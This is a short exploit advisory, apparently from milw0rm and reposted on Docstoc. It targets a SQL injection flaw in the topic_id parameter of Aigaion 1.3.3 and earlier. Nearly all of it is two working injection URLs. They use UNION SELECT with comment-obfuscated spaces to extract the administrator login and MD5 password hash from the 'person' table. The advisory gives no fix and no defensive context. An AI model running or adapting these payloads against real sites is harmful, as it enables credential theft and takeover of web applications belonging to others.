Docstoc

Aigaion 1.3.3 topic topic_id Remote SQL Injection Vulnerability

Document Sample
Aigaion 1.3.3 topic topic_id Remote SQL Injection Vulnerability Powered By Docstoc
					                     Aigaion 1.3.3 topic topic_id Remote SQL Injection Vulnerability                              Page 1/1
  1    −−==+================================================================================+==−−
  2    −−==+                       Aigaion <= 1.3.3 SQL Injection Exploit                   +==−−
  3    −−==+================================================================================+==−−
  4    DISCOVERED BY: Cody "CypherXero" Rester
  5    PAYLOAD: Admin username and MD5 Hash
  6    WEBSITE: http://www.cypherxero.net
  7
  8    Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
  9    −−==+================================================================================+==−−
  10
  11   EXPLOITS:
  12
  13   http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58
       ),password),null/**/FROM/**/person/**/WHERE/**/ID=1−−
  14   http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FRO
       M/**/person−−
  15
  16   # milw0rm.com [2007−07−09]




CypherXero                                                                                                         07/09/2007

				
DOCUMENT INFO